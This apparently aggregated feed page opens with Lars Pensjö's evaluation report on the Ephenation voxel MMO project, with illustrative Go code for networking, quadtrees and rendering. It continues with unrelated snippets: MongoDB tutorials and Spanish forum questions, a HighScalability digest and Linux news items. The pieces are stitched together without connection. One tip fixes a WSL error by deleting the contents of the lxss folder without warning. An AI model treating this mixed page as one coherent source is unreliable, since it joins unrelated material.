Ephenation evaluation report        

Vision of Ephenation

The vision is a game like World of Warcraft, where players are able to add their own adventures. I think this is a probable future development. This type of game should be fully realized and generally available in something like 10 to 20 years.

Goals

Unlimited world

The size of the world should not be limited. It is easier to implement a flat world than a spherical world, and a flat world can be unlimited. The natural terrain will obviously have to be generated automatically.

Unlimited players

This is not possible, of course, but the number of simultaneous players should be large. A limit of 10 or 100 is much too small, as everyone would more or less know everyone and work on the same project. A minimum would be 1000 players, but preferably more than 10000. That leads to a situation where you always meet new players you don't know, and the world is big enough that you can always find somewhere you have not explored.

Unlimited levels

Most RPG-type games have a limited set of levels, but that puts a limit on the game play. After reaching the top level, the game is no longer the same. Not only that, but there is a kind of race to reach this top level. Instead, there shall be no final top level. That puts the emphasis on constant exploration and progress.

Allocate territory

Players should be able to allocate a territory, where they can design their own adventures. This territory shall be protected from others, making sure no one else can interfere with the design.

Social support

The community and social interaction are very important. That is one reason for the requirement to support many players, as it will allow you to include all your friends. There are a couple of ways to encourage community:
  1. Use of guilds. This would be a larger group of players, where you know the others.
  2. Temporary teams, used when exploring. It is more fun to explore with others.
  3. Use of common territories. It shall be possible to cooperate with friends to make territories that are related and possibly adjacent to each other.

Mechanics

It shall be possible to design interesting buildings, landscapes and adventures. The adventures shall be advanced enough to support triggered actions, with dynamic behavior that depends on player choices.

Execution

This is a description of how the project was executed. It was started at the end of 2010. Most of the programming was done by me (Lars Pensjö), but I got support with several sub-modules.

Server

It was decided to use Go as the programming language for the server. Go has just the right support for this type of software:
  1. High performance (compiled language)
  2. Object-oriented, with static typing
  3. A concept of goroutines (a lightweight version of threads)
  4. A very high rate of "it works when it compiles"
  5. Garbage collection
The disadvantage of Go when the Ephenation project was started was that it was a new language, still in transition, with an uncertain future. This turned out not to be a problem, and the language today has a frozen specification (Go 1).
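
As a minimal sketch of why goroutines fit this kind of server: each connected player can be served by its own lightweight goroutine, with commands funneled over a channel to a single world loop that owns the model data. The names below (command, handlePlayer, worldLoop, port 8080) are my own illustration, not the actual Ephenation source.

package main

import (
	"bufio"
	"fmt"
	"net"
)

// command is a hypothetical message from a player connection to the world loop.
type command struct {
	player string
	text   string
}

// handlePlayer runs as one goroutine per connection and forwards lines as commands.
func handlePlayer(conn net.Conn, out chan<- command) {
	defer conn.Close()
	scanner := bufio.NewScanner(conn)
	for scanner.Scan() {
		out <- command{player: conn.RemoteAddr().String(), text: scanner.Text()}
	}
}

// worldLoop serializes all world updates in a single goroutine, so no locking
// is needed for the data it owns.
func worldLoop(in <-chan command) {
	for cmd := range in {
		fmt.Printf("player %s sent %q\n", cmd.player, cmd.text)
	}
}

func main() {
	listener, err := net.Listen("tcp", ":8080")
	if err != nil {
		panic(err)
	}
	commands := make(chan command, 100)
	go worldLoop(commands)
	for {
		conn, err := listener.Accept()
		if err != nil {
			continue
		}
		go handlePlayer(conn, commands) // one lightweight goroutine per player
	}
}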

To be able to manage a massive number of players, quadtrees are used for both players and monsters.
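
A quadtree makes "find all entities near this position" cheap, which is exactly what per-player updates need. The sketch below is a generic point quadtree with a range query over flat 2D world coordinates; it illustrates the idea and is not the server's actual data structure.

package main

import "fmt"

// point is a 2D position in the horizontal plane of the world.
type point struct{ x, y float64 }

// quadTree stores points in a square region. A node splits into four children
// once it holds more than capacity points, keeping range queries cheap.
type quadTree struct {
	x, y, size float64 // covers the square [x, x+size) x [y, y+size)
	capacity   int
	points     []point
	children   [4]*quadTree
}

func newQuadTree(x, y, size float64, capacity int) *quadTree {
	return &quadTree{x: x, y: y, size: size, capacity: capacity}
}

func (q *quadTree) contains(p point) bool {
	return p.x >= q.x && p.x < q.x+q.size && p.y >= q.y && p.y < q.y+q.size
}

func (q *quadTree) insert(p point) bool {
	if !q.contains(p) {
		return false
	}
	if q.children[0] == nil && len(q.points) < q.capacity {
		q.points = append(q.points, p)
		return true
	}
	if q.children[0] == nil {
		q.split()
	}
	for _, c := range q.children {
		if c.insert(p) {
			return true
		}
	}
	return false
}

// split divides the node into four quadrants and redistributes its points.
func (q *quadTree) split() {
	h := q.size / 2
	q.children[0] = newQuadTree(q.x, q.y, h, q.capacity)
	q.children[1] = newQuadTree(q.x+h, q.y, h, q.capacity)
	q.children[2] = newQuadTree(q.x, q.y+h, h, q.capacity)
	q.children[3] = newQuadTree(q.x+h, q.y+h, h, q.capacity)
	old := q.points
	q.points = nil
	for _, p := range old {
		q.insert(p)
	}
}

// queryRange collects all points inside the square [x,x+size) x [y,y+size),
// e.g. "all players and monsters near this position".
func (q *quadTree) queryRange(x, y, size float64, out *[]point) {
	if x+size <= q.x || x >= q.x+q.size || y+size <= q.y || y >= q.y+q.size {
		return // no overlap with this node
	}
	for _, p := range q.points {
		if p.x >= x && p.x < x+size && p.y >= y && p.y < y+size {
			*out = append(*out, p)
		}
	}
	if q.children[0] != nil {
		for _, c := range q.children {
			c.queryRange(x, y, size, out)
		}
	}
}

func main() {
	tree := newQuadTree(0, 0, 1024, 4)
	tree.insert(point{10, 20})
	tree.insert(point{300, 400})
	var near []point
	tree.queryRange(0, 0, 100, &near) // everything in the 100x100 square at the origin
	fmt.Println(near)                 // [{10 20}]
}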

It is the server that has full control over all model data: player attributes, melee mechanics, movement, etc.

Client

The client was initially designed in C, but I soon switched to C++. There are still some remnants from C, which explains some not-so-good OO solutions. OpenGL was selected instead of DirectX, partly as a random choice, but also because I wanted to do the development in Linux.

It was decided to use OpenGL 3.3, instead of supporting older variants. There are some nice improvements in OpenGL that make design easier, which was deemed more important than supporting old hardware.

The world consists of blocks (voxels). This is difficult to draw in real time at a high FPS, as the number of faces grows very quickly with viewing distance. Considerable effort was spent on transforming the list of cubes into a list of visible triangles. It is also difficult to make a level-of-detail (LOD) algorithm that gradually reduces detail at long distances.
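
The key observation is that a cube face only needs triangles if the neighbouring voxel is air; faces between two solid blocks can be dropped. Below is a minimal sketch of that culling pass, written in Go for illustration (the real client does this in C++), with a hypothetical 16-cubed chunk layout:

package main

import "fmt"

const chunkSize = 16

// chunk is a cube of voxels; 0 means air, anything else is a solid block.
type chunk [chunkSize][chunkSize][chunkSize]uint8

// face identifies one visible cube face, to be turned into two triangles later.
type face struct {
	x, y, z int // voxel coordinates
	dir     int // 0..5: +x, -x, +y, -y, +z, -z
}

var neighbours = [6][3]int{{1, 0, 0}, {-1, 0, 0}, {0, 1, 0}, {0, -1, 0}, {0, 0, 1}, {0, 0, -1}}

// visibleFaces returns only the faces that border air (or the chunk boundary);
// interior faces between two solid blocks are culled, which is what keeps the
// triangle count manageable.
func visibleFaces(c *chunk) []face {
	var out []face
	for x := 0; x < chunkSize; x++ {
		for y := 0; y < chunkSize; y++ {
			for z := 0; z < chunkSize; z++ {
				if c[x][y][z] == 0 {
					continue // air produces no faces
				}
				for d, n := range neighbours {
					nx, ny, nz := x+n[0], y+n[1], z+n[2]
					outside := nx < 0 || ny < 0 || nz < 0 ||
						nx >= chunkSize || ny >= chunkSize || nz >= chunkSize
					if outside || c[nx][ny][nz] == 0 {
						out = append(out, face{x, y, z, d})
					}
				}
			}
		}
	}
	return out
}

func main() {
	var c chunk
	c[8][8][8] = 1                     // one solid block in the middle
	fmt.Println(len(visibleFaces(&c))) // prints 6
}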

Another technical difficulty with a world based on cubes was making it look nice instead of blocky. Some algorithms were investigated that used a kind of filter. As the view distance is limited, there can be a conflict when the player is underground.

The game engine can't know whether the far distance, which is not visible, should be replaced by a light background (from the sky) or a dark background (typical of being underground). A compromise is used, where the color of the distance fog depends on the player's height.
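
A sketch of that compromise: blend the fog color from a dark underground tone to a light sky tone as the player's height passes through a transition zone. The colors and the -10..+10 blend interval are invented for the example, and the sketch is in Go for consistency with the other examples (the real client is C++).

package main

import "fmt"

// color is a simple RGB triple in [0,1].
type color struct{ r, g, b float64 }

var (
	skyFog  = color{0.6, 0.7, 0.9}    // light fog, used above ground
	caveFog = color{0.05, 0.05, 0.05} // dark fog, used underground
)

// fogColor blends between the underground and sky fog depending on the
// player's height. The blend interval (-10..+10) is an assumption for the sketch.
func fogColor(playerHeight float64) color {
	t := (playerHeight + 10) / 20
	if t < 0 {
		t = 0
	}
	if t > 1 {
		t = 1
	}
	return color{
		r: caveFog.r + t*(skyFog.r-caveFog.r),
		g: caveFog.g + t*(skyFog.g-caveFog.g),
		b: caveFog.b + t*(skyFog.b-caveFog.b),
	}
}

func main() {
	fmt.Println(fogColor(-30)) // deep underground: dark fog
	fmt.Println(fogColor(50))  // high above ground: sky-colored fog
}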

Protocol

There are strict requirements on the protocol. If a server shall be able to handle 10,000+ players, the communication can easily become a bottleneck. TCP/IP was selected in favor of UDP/IP, to make it easier to handle traffic control. The protocol itself is not based on any standard and is completely customized for Ephenation.
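
Because TCP is a byte stream, a custom protocol like this needs its own message framing. The sketch below uses a 2-byte length prefix followed by a one-byte message type; the layout is my assumption, not the real Ephenation wire format.

package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"io"
)

// writeMessage frames a message as: 2-byte little-endian length, 1-byte type, payload.
func writeMessage(w io.Writer, msgType byte, payload []byte) error {
	length := uint16(1 + len(payload))
	if err := binary.Write(w, binary.LittleEndian, length); err != nil {
		return err
	}
	if _, err := w.Write([]byte{msgType}); err != nil {
		return err
	}
	_, err := w.Write(payload)
	return err
}

// readMessage reads one framed message back from the stream.
func readMessage(r io.Reader) (msgType byte, payload []byte, err error) {
	var length uint16
	if err = binary.Read(r, binary.LittleEndian, &length); err != nil {
		return
	}
	if length == 0 {
		return 0, nil, fmt.Errorf("empty message")
	}
	buf := make([]byte, length)
	if _, err = io.ReadFull(r, buf); err != nil {
		return
	}
	return buf[0], buf[1:], nil
}

func main() {
	var stream bytes.Buffer
	writeMessage(&stream, 0x01, []byte("hello"))
	t, p, _ := readMessage(&stream)
	fmt.Println(t, string(p)) // 1 hello
}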

Mechanics

There are two major choices: either use a scripting language to control aspects of the world, or use a graphical approach. A scripting language is more powerful, but it is also harder to learn. There is also the problem of supporting a massive number of players, in which case time-consuming scripts would make it unfeasible.

The choice was to go for a limited set of blocks, with a special block type that can be used to initiate predefined actions. Inspiration was taken from the principles of Lego blocks. With a relatively small set of basic blocks, it is possible to construct the most amazing things.
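
As a hedged sketch of what such an action-initiating block might look like on the server side: a block that carries one of a small set of predefined actions and fires it when triggered. The type names and the set of actions are invented for illustration; they are not the actual Ephenation block definitions.

package main

import "fmt"

// action is one of a predefined set of things an activator block can do.
type action int

const (
	actionSpawnMonster action = iota
	actionOpenDoor
	actionShowMessage
)

// activatorBlock is a special block that fires an action when a player is close.
type activatorBlock struct {
	x, y, z int
	act     action
	message string  // only used by actionShowMessage
	radius  float64 // trigger distance
}

// trigger would be called by the world loop when a player comes within radius.
func (a *activatorBlock) trigger(player string) {
	switch a.act {
	case actionSpawnMonster:
		fmt.Printf("spawning a monster near %s at (%d,%d,%d)\n", player, a.x, a.y, a.z)
	case actionOpenDoor:
		fmt.Printf("opening door at (%d,%d,%d) for %s\n", a.x, a.y, a.z, player)
	case actionShowMessage:
		fmt.Printf("to %s: %s\n", player, a.message)
	}
}

func main() {
	b := activatorBlock{x: 1, y: 2, z: 3, act: actionShowMessage, message: "Welcome, adventurer!", radius: 2}
	b.trigger("alice")
}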

Evaluation

Game engine

The client side was designed from scratch, instead of using an existing game engine. This may have been a mistake, as the main development time was spent on graphics technology instead of exploring the basic vision.

Adventure design and mechanics

The set of blocks and the possible actions with "activator blocks" are currently limited. It is not enough to construct full adventures that are fun to explore and provide great entertainment.
[Picture: An early version of the game, where a player abused the monster spawner.]

Game play

The basic world is automatically generated. This usually makes a game of limited interest, as game play is bound to become repetitive. Support from initial players enabled the creation of a world with many new buildings and creations. The more advanced features that support dynamic behavior were not added until later, which unfortunately led to most of the current world being too static.

Graphics

The graphics are working, but far from production level. There are several glitches, e.g. the camera falling inside walls and lighting effects being cut off. As the world is dynamic, the possibilities for offline precalculation are limited. That means most graphical effects have to be computed live, which is a difficult requirement. For example, it is not known how many light sources it should be possible to manage. A deferred shader was chosen, which improves the decoupling between geometry and shading.
[Picture: An early attempt to create automatic monsters. This was later replaced with fully animated models.]

Social

The social side of the game play has only been explored to a limited extent. There are ways to send messages to nearby players, and to communicate privately with any player. Although this is a very important aspect of the final vision, it is known technology and not difficult to implement.

Performance tests

The aggressive requirement to support 10,000 simultaneous players is hard to verify. A simple simulator was used, adding 1000 players at random positions with a uniform density. These players simply walked around. If they were attacked, they attacked back. If they were killed, they automatically used the command to revive.
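
A minimal sketch of such a simulator: one goroutine per simulated player that walks around, attacks back when attacked, and revives when killed. The helper methods stand in for the real network commands and are not the actual test code.

package main

import (
	"math/rand"
	"time"
)

// simPlayer is one simulated client. The fields and methods are stand-ins for
// the real client commands; they are not the actual Ephenation test code.
type simPlayer struct {
	id       int
	x, y     float64
	attacked bool
	dead     bool
}

func (p *simPlayer) walkRandomly() {
	p.x += rand.Float64() - 0.5
	p.y += rand.Float64() - 0.5
}

func (p *simPlayer) attackBack() {
	p.attacked = false // pretend the attacker was fought off
}

func (p *simPlayer) revive() {
	p.dead = false // corresponds to the player issuing the revive command
}

// run is the per-bot loop: walk around, attack back if attacked, revive if killed.
func (p *simPlayer) run() {
	ticker := time.NewTicker(100 * time.Millisecond)
	defer ticker.Stop()
	for range ticker.C {
		switch {
		case p.dead:
			p.revive()
		case p.attacked:
			p.attackBack()
		default:
			p.walkRandomly()
		}
	}
}

func main() {
	const numPlayers = 1000
	for i := 0; i < numPlayers; i++ {
		p := &simPlayer{id: i, x: rand.Float64() * 10000, y: rand.Float64() * 10000}
		go p.run() // one lightweight goroutine per simulated player
	}
	time.Sleep(time.Minute) // let the simulation run
}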

On a Core i7 with 8 GB of RAM, the load on the server was approximately 10%. This is no proof that the server can actually manage 10,000 players, as there may be non-linear dependencies. There are known bottlenecks, for example monster management, which is currently handled by a single thread. That means at most one core can be used for it, but it should be possible to distribute this task over several smaller goroutines.

The communication was measured at around 100 MB/s. With linear scaling, that would be 1 GB/s for 10,000 players. The intention is that the scaling should be linear, as cross-communication between players is designed to be of constant volume. Still, this remains to be proven.

There is the obvious question of whether the simulator is representative of real players. One way to improve that assessment would be to measure the actual behaviour of real players and compare it with the simulator.

Another possible bottleneck is the communication with the player database (MongoDB). This depends on the number of logins/logouts and auto-saves. It also depends on the load generated by the web page. This has not been evaluated. Typically, an access takes about 1 ms. MongoDB is currently located on the same system as the game server, minimizing communication latency. The database will have to be managed by a separate computer system for a full production server.

Equipment

The objects that the player can wear and wield are simplified. As the game concept is unlimited, it is not possible to hand-craft objects. Instead, there are 4 defined qualities for each object, per level.

Communication

TCP/IP has a higher overhead than UDP/IP. Some packets are big (complete chunks), which would have required several UDP/IP packets and complicated transmission control. It may be that UDP/IP should be used instead. However, this was not an issue for the evaluation of the project.

As the server is responsible for all object attributes, the clients need to be updated frequently. Player and monster positions are updated 10 times per second. This generates a considerable amount of data, so updates are limited to nearby players. Because of this, the client needs to interpolate positions to show smooth movement, and it needs to be able to manage stale information about other players and monsters. The advantage of having the server manage all attributes is that it is not possible to cheat. The client source code is available, and it would otherwise have been easy to make changes.
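
A sketch of the interpolation idea (in Go for consistency with the other examples; the real client is C++): keep the last two server positions with their arrival times and blend between them, staying at the newest known position when updates are late.

package main

import (
	"fmt"
	"time"
)

// position is a server-reported position with the time it was received.
type position struct {
	x, y, z float64
	when    time.Time
}

// remoteEntity tracks another player or monster from the 10 Hz server updates.
type remoteEntity struct {
	prev, last position
}

// update is called whenever a new server position arrives.
func (e *remoteEntity) update(p position) {
	e.prev, e.last = e.last, p
}

// positionAt linearly interpolates between the two last known positions so the
// entity moves smoothly between updates; if now is past the last update, it
// simply stays at the last known (stale) position.
func (e *remoteEntity) positionAt(now time.Time) (x, y, z float64) {
	span := e.last.when.Sub(e.prev.when)
	if span <= 0 {
		return e.last.x, e.last.y, e.last.z
	}
	t := float64(now.Sub(e.prev.when)) / float64(span)
	if t < 0 {
		t = 0
	}
	if t > 1 {
		t = 1
	}
	return e.prev.x + t*(e.last.x-e.prev.x),
		e.prev.y + t*(e.last.y-e.prev.y),
		e.prev.z + t*(e.last.z-e.prev.z)
}

func main() {
	now := time.Now()
	e := &remoteEntity{}
	e.update(position{x: 0, when: now})
	e.update(position{x: 1, when: now.Add(100 * time.Millisecond)})
	x, _, _ := e.positionAt(now.Add(50 * time.Millisecond))
	fmt.Println(x) // about 0.5
}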

Conclusion

Moore's law

I believe computers will continue to grow exponentially more powerful for many years yet. However, the full power will probably not be accessible unless the game server can scale well with an increasing number of cores. The performance tests were done on hardware from 2011, and much more powerful equipment is already available.

Adventure design

As a proof of concept, I think the project was successful. What I miss most is a sufficiently powerful mechanism for custom adventures. This is a key point of the game concept, but I believe that with more people involved, new ideas would emerge that would improve the possibilities considerably.

Document update history

2013-02-22 First published.
2013-02-24 Added discussion about using voxels on the client side.
2013-02-27 Information about entity attribute management and communication.
2015-05-04 Pictures failed, and were replaced.

          _id With Mongoose        
Let us take a very common use-case: “There will be a registration page for users, where users will provide their required details along with their picture”. Details would be saved to MongoDB while the pictures would be uploaded to Cloudinary or S3 with user unique id.” Suppose we have User Schema as given below: We […]
          Error 0x80070005 Bash Ubuntu en Windows 10        

La solución a este error es muy sencilla. Ir a la carpeta donde están los archivos del bash: %localappdata%\lxss Eliminar el contenido de la carpeta Eso es todo. Este error puede persistir después de des-instalar y reinstalar el sub-sistema, incluso, después Continuar leyendo

La entrada Error 0x80070005 Bash Ubuntu en Windows 10 se publicó primero en Juarbo.


          Red Hat Enterprise Linux gets cozy with MongoDB        
Easing the path for organizations to launch big data-styled services, Red Hat has coupled the 10gen MongoDB data store to its new identity management package for the Red Hat Enterprise Linux (RHEL) distribution.
          10gen expands MongoDB with storage service        
Open source database provider 10gen is expanding into storage services, offering a hosted backup service for its flagship MongoDB data store.
          MongoDB refines load balancing        
Following the tradition set by recent versions, the new release of the MongoDB NoSQL data store comes with a batch of new features designed to appeal to the enterprise market, including a new built-in search engine, more support for geospatial data and the ability to balance workloads across multiple servers more effectively.
          MongoDB competes on speed and flexibility        
While debate rages on over the value of nonrelational, or NoSQL, databases, two case studies presented at a New York conference this week point to the benefits of using the MongoDB non-SQL data store instead of a standard relational database.
          Internet databases MongoDB, Drizzle upgraded        
Two performance-minded databases created for supporting Internet services and cloud computing have been revised: MongoDB has been updated and Drizzle has reached its first production-ready release.
          mongoArray        

mongoArray

Respuesta a mongoArray

Prueba con:

db.usuario.update( {nombre:'erwis'}, { $addToSet:{seguridad:[{pregunta:'¿mascota favorita?',respuesta:'chichi'}]} }, {upsert:true} ); MongoDB Enterprise > db.usuario.find().count(); 0
MongoDB Enterprise > db.usuario.update( {nombre:'erwis'}, { $addToSet:{seguridad:{pregunta:'¿mascota favorita?',respuesta:'chichi'}} }, {upsert:true} ); WriteResult({ "nMatched" : 0, "nUpserted...

Publicado el 16 de Junio del 2017 por Andrés

          mongoArray        

mongoArray

Buenos días estoy empezando con mongoDb . (nota: la colecion , array y documento se asemeja al real solo que lo coloque de forma sencilla) tengo un problema vease primero el ejemplo de la collection que tengo:
db.usuario.insert({"id":"123","nombre":"erwis" seguridad:[{"pregunta":"'¿mascota favorita?","respuesta":"chichi",}] });
yo necesito validar que un usuario no...

Publicado el 12 de Junio del 2017 por Erwis

          Where field not array        

Where field not array

Hola,
Haver si me pueden ayudar, no suelo trabajar con MongoDB así que voy un poco perdido, lo que necesito lo indico claramente en el titulo. Necesito obtener todos los documentos que un field concreto no sea de tipo array, he visto $type y BSON types (array) pero no me devuelve los resultados que quiero.. es mas me dice (Robomongo) Script executed successfully, but there are no results to show.
Ejemplo con array en "otros"."otro"
Publicado el 16 de Febrero del 2017 por oriol anton

          Duda en mongodb con consulta usando operaciones aritmeticas        

Duda en mongodb con consulta usando operaciones aritmeticas

Respuesta a Duda en mongodb con consulta usando operaciones aritmeticas

Hola,

Sé que tiene mucho tiempo este hilo de conversación abierto, pero buscando algo sobre mongo, encontré este traductor de consultas sql en consulta para mongodb.

[url]

Pongo la liga para que no se me olvide y en algún momento no muy lejano me pueda servir.


Saludos
José Luis

Publicado el 14 de Febrero del 2017 por José Luis

          geotiff en mongodb?        

geotiff en mongodb?

Hola lista

Necesito saber su opinión sobre si es posible almacenar archivos geoTiff (o sea, imagenes georeferenciadas) en MongoDB. Y ademas, de ser esto posible, cual es el tamaño máximo de archivo a almacenar que MondoDB soporta en el casi de este tipo de archivos.

Saludos

Publicado el 07 de Febrero del 2017 por Pablo

          Insert de forma masiva        

Insert de forma masiva

Respuesta a Insert de forma masiva

Hola,

Existen 2 comandos en mongodb para importar y exportar.


mongoexport

y

mongoimport

ademas de otros comandos.

mongo mongoexport mongooplog mongos
mongod mongofiles mongoperf mongostat
mongodump mongoimport mongorestore mongotop


Saludos
José Luis

Publicado el 01 de Diciembre del 2016 por José Luis

          Consulta basica MongoDB        

Consulta basica MongoDB

Hola, estoy intentando aprender MongoDB y me surgen algunas preguntas puntuales.

Entiendo que MongoDB esta diseñado para una escalabilidad horizontal por lo que las relaciones entre colecciones no son lo que se espera, pero me surgio la siguiente pregunta.
Yo tengo la coleccion alumnos con sus cursos:


{ nombre: "Azure", cursos: [ { nombre:"Matematica", codigo:"M001&...

Publicado el 28 de Octubre del 2016 por Zangles

          Bloquear Autenticación anónima mongodb        

Bloquear Autenticación anónima mongodb

Buenos días,
tengo configurado el mongodb para poder ingresar solo con usuario y password.
Esta es mi configuración:
setParameter:
enableLocalhostAuthBypass: false
security:
authorization: enabled


Si ingreso el comando "mongo" sin parámetros de usuario y password me devuelve:
# mongo
MongoDB shell version: 3.2.8
connecting to: test

> show collections
...

Publicado el 27 de Septiembre del 2016 por Dennis

          Duda en mongodb con consulta usando operaciones aritmeticas        

Duda en mongodb con consulta usando operaciones aritmeticas

Respuesta a Duda en mongodb con consulta usando operaciones aritmeticas

la consulta que quiero expresar en mongoDB es esta:

SELECT ra,dec from db WHERE valor_absoluto(ra-ra0)<tamaño/2 && valor_absoluto(dec-dec0)<tamaño/2

Publicado el 11 de Agosto del 2016 por William

          Duda en mongodb con consulta usando operaciones aritmeticas        

Duda en mongodb con consulta usando operaciones aritmeticas

Buen día.

Tengo una duda que me surgió de repente porque creo que no había tenido la oportunidad de hacer una consulta así pero me tocó y no tengo idea de como hacerla o no se si se pueda hacer.

Lo que intento hacer es una consulta en mongodb sencilla pero que incluya operaciones aritméticas, me explico:

valor_absoluto(ra-ra0)<tamaño/2 && valor_absoluto(dec-dec0)<tamaño/2

En donde: ra0, dec0 y tamaño son valores de entrada...

Publicado el 10 de Agosto del 2016 por William

          Alguien tendra un ejemplo de como hacer una consulta en dos collectiones.??        

Alguien tendra un ejemplo de como hacer una consulta en dos collectiones.??

Respuesta a Alguien tendra un ejemplo de como hacer una consulta en dos collectiones.??

A partir de mongodb 3.2, tienes el operador $lookup, que vincula las colecciones
[url]

Publicado el 29 de Julio del 2016 por xve

          Stuff The Internet Says On Scalability For July 14th, 2017        

Hey, it's HighScalability time:

 

 

We've seen algorithms expressed in seeds. Here's an algorithm for taking birth control pills expressed as packaging. Awesome history on 99% Invisible.

If you like this sort of Stuff then please support me on Patreon.

 

  • 2 trillion: web requests served daily by Akamai; 9 billion: farthest star ever seen in light-years; 10^31: bacteriophages on earth; 7: peers needed to repair ransomware damage; $30,000: threshold of when to leave AWS; $300K-$400K: beginning cost of running Azure Stack on HPE ProLiant; 3.5M: files in the Microsoft's git repository; 300M: Google's internal image data training set size; 7.2 Mbps: global average connection speed; 85 million: Amazon Prime members; 35%: Germany generated its electricity from renewables;

  • Quotable Quotes:
    • Jessica Flack: I believe that science sits at the intersection of these three things — the data, the discussions and the math. It is that triangulation — that’s what science is. And true understanding, if there is such a thing, comes only when we can do the translation between these three ways of representing the world.
    • gonchs: “If your whole business relies on us [Medium], you might want to pick a different one”
    • @AaronBBrown777: Hey @kelseyhightower, if you're surfing GitHub today, you might find it interesting that all your web bits come thru Kubernetes as of today.
    • Psyblog: The researchers were surprised to find that a more rebellious childhood nature was associated with a higher adult income.
    • Antoine de Saint-Exupéry: If you want to build a ship, don't drum up people to collect wood and don't assign them tasks and work, but rather teach them to long for the endless immensity of the sea.
    • Marek Kirejczyk: In general I would say: if you need to debug — you’ve already lost your way.
    • jasondc: To put it another way, RethinkDB did extremely well on Hacker News. Twitter didn't, if you remember all the negative posts (and still went public). There is little relation between success on Hacker News and company success.
    • Rory Sutherland: What intrigues me about human decision making is that there seems to be a path-dependence involved - to which we are completely blind.
    • joeblau: That experience taught me that you really need to understand what you're trying to solve before picking a database. Mongo is great for some things and terrible for others. Knowing what I know now, I would have probably chosen Kafka.
    • 0xbear: cloud "cores" are actually hyperthreads. Cloud GPUs are single dies on multi-die card. If you use GPUs 24x7, just buy a few 1080 Ti cards and forego the cloud entirely. If you must use TF in cloud with CPU, compile it yourself with AVX2 and FMA support. Stock TF is compiled for the lowest common denominator
    • Dissolving the Fermi Paradox: Doing a distribution model shows that even existing literature allows for a substantial probability of very little life, and a more cautious prior gives a significant probability for rare life
    • Peter Stark: Crews with clique structures report significantly more depression, anxiety, anger, fatigue and confusion than crews with core-periphery structures.
    • Patrick Marshall: Gu said that the team expects to have a prototype [S2OS’s software-defined hypervisor is being designed to centrally manage networking, storage and computing resources] ready in about three years that will be available as open-source software.
    • cobookman: I've been amazed that more people don't make use of googles preemtibles. Not only are they great for background batch compute. You can also use them for cutting your stateless webserver compute costs down. I've seen some people use k8s with a cluster of preemtibles and non preemtibles. 
    • @jeffsussna: Complex systems can’t be fully modeled. Failure becomes the only way to fully discover requirements. Thus the need to embrace it.
    • Jennifer Doudna: a genome’s size is not an accurate predictor of an organism’s complexity; the human genome is roughly the same length as a mouse or frog genome, about ten times smaller than the salamander genome, and more than one hundred times smaller than some plant genomes.
    • Daniel C. Dennett: In Darwin’s Dangerous Idea (1995), I argued that natural selection is an algorithmic process, a collection of sorting algorithms that are themselves composed of generate-and-test algorithms that exploit randomness (pseudo-randomness, chaos) in the generation phase, and some sort of mindless quality-control testing phase, with the winners advancing in the tournament by having more offspring.
    • Almir Mustafic: My team learned the DynamoDB limitations before we went to production and we spent time calculating things to properly provision RCUs and WCUs. We are running fine in production now and I hear that there will be automatic DynamoDB scaling soon. In the meantime, we have a custom Python script that scales our DynamoDB.

  • I've written a novella: The Strange Trial of Ciri: The First Sentient AI. It explores the idea of how a sentient AI might arise as ripped from the headlines deep learning techniques are applied to large social networks. I try to be realistic with the technology. There's some hand waving, but I stay true to the programmers perspective on things. One of the big philosophical questions is how do you even know when an AI is sentient? What does sentience mean? So there's a trial to settle the matter. Maybe. The big question: would an AI accept the verdict of a human trial? Or would it fight for its life? When an AI becomes sentient what would it want to do with its life? Those are the tensions in the story. I consider it hard scifi, but if you like LitRPG there's a dash of that thrown in as well. Anyway, I like the story. If you do too please consider giving it a review on Amazon. Thanks for your support!

  • Serving 39 Million Requests for $370/Month, or: How We Reduced Our Hosting Costs by Two Orders of Magnitude. Step 1: Just Go Serverless: Simply moving to a serverless environment had the single greatest impact on reducing hosting costs. Our extremely expensive operating costs immediately shrunk by two orders of magnitude. Step 2: Lower Your Memory Allocation: Remember, each time you halve your function’s memory allocation, you’re roughly halving your Lambda costs. Step 3: Cache Your API Gateway Responses: We pay around $14 a month for a 0.5GB API Gateway cache with a 1 hour TTL. In the last month, 52% (20.3MM out of 39MM) of our API requests were served from the cache, meaning less than half (18.7MM requests) required invoking our Lambda function. That $14 saves us around $240 a month in Lambda costs.

Don't miss all that the Internet has to say on Scalability, click below and become eventually consistent with all scalability knowledge (which means this post has many more items to read so please keep on reading)...


          today's leftovers        
  • Linux Weather Forecast

    This page is an attempt to track ongoing developments in the Linux development community that have a good chance of appearing in a mainline kernel and/or major distributions sometime in the near future. Your "chief meteorologist" is Jonathan Corbet, Executive Editor at LWN.net. If you have suggestions on improving the forecast (and particularly if you have a project or patchset that you think should be tracked), please add your comments below.

  • Linux guru Linus Torvalds is reviewing gadgets on Google+

    Now it appears the godfather of Linux has started to put all that bile to good use by reviewing products on Google+.

  • Learning to love Ansible

    I’ve been convinced about the merits of configuration management for machines for a while now; I remember conversations about producing an appropriate set of recipes to reproduce our haphazard development environment reliably over 4 years ago. That never really got dealt with before I left, and as managing systems hasn’t been part of my day job since then I never got around to doing more than working my way through the Puppet Learning VM. I do, however, continue to run a number of different Linux machines - a few VMs, a hosted dedicated server and a few physical machines at home and my parents’. In particular I have a VM which handles my parents’ email, and I thought that was a good candidate for trying to properly manage. It’s backed up, but it would be nice to be able to redeploy that setup easily if I wanted to move provider, or do hosting for other domains in their own VMs.

  • GSoC: Improvements in kiskadee architecture

    Today I have released kiskadee 0.2.2. This minor release brings some architecture improvements, fix some bugs in the plugins and improve the log messages format. Initially, lets take a look in the kiskadee architecture implemented on the 0.2 release.

  • How UndoDB works

    In the previous post I described what UndoDB is, now I will describe how the technology works.

    The naïve approach to record the execution of a program is to record everything that happens, that is the effects of every single machine instruction. This is what gdb does to offer reversible debugging.

  • Wild West RPG West of Loathing Launches for PC/Mac/Linux on August 10th

    Today, developer Asymmetric announced that its comedy, wild west RPG, West of Loathing, is poised to launch for PC, Mac, and Linux on August 10th.

  • Canonical asks users' help in deciding Ubuntu Linux desktop apps

    Canonical Ubuntu Linux has long been one of the most popular Linux desktop distributions. Now, its leadership is looking to its users for help to decide the default desktop applications in the next long-term support version of the operating system: Ubuntu 18.04.

    This release, scheduled for April 2018, follows October's Ubuntu 17.10, Artful Aardvark. Ubuntu 18.04 will already include several major changes. The biggest of these is Ubuntu is abandoning its Unity 8 interface to go back to the GNOME 3.x desktop.

  • Enhanced Open Source Framework Available for Parallel Programming on Embedded Multicore Devices
  • Studiolada used all wood materials to create this affordable open-source home anyone can build

